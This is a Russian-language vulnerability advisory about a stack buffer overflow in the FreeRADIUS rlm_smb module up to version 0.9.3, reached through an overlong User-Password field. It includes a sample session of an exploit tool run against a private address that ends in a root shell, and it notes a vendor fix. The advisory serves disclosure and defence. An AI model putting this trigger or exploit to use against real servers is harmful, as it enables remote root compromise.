Переполнение буфера в rlm_smb модуле в FreeRADIUS

Дата публикации:
28.11.2003
Всего просмотров:
910
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: FreeRADIUS 0.9.3 и более ранние версии

Описание: Переполнение буфера обнаружено в FreeRADIUS в rlm_smb модуле. Удаленный пользователь может выполнить произвольный код с root привилегиями.

Удаленный пользователь может представить чрезмерно длинный User-Password параметр, длинее 128 байт, чтобы вызвать переполнение стекового буфера. Уязвимость расположена в функции SMB_Logon_Server() в 'src/modules/rlm_smb/smblib.c' файле.

Пример/Эксплоит:

$ ./bugfree -p 1812 -u cparker -s testing123 192.168.3.12
FreeRADIUS <= 0.9.3 rlm_smb remote overflow exploit (PoC)
 
Trying to login as user "cparker" with secret "testing123" ...
Prepared the packet, 513 bytes
Attacking 192.168.3.12:1812 ...
Sent, checking for a shell ...
Success, proceed with commands
 
Linux lina.s-quadra.com 2.4.20 #1 Wed Nov 19 22:21:27 EST 2003 i686 unknown
uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
exit

URL производителя: http://www.freeradius.org

Решение:Производитель выпустил исправление, доступное через CVS.

Ссылки: FreeRADIUS <= 0.9.3 rlm_smb module stack overflow vulnerability

или введите имя

CAPTCHA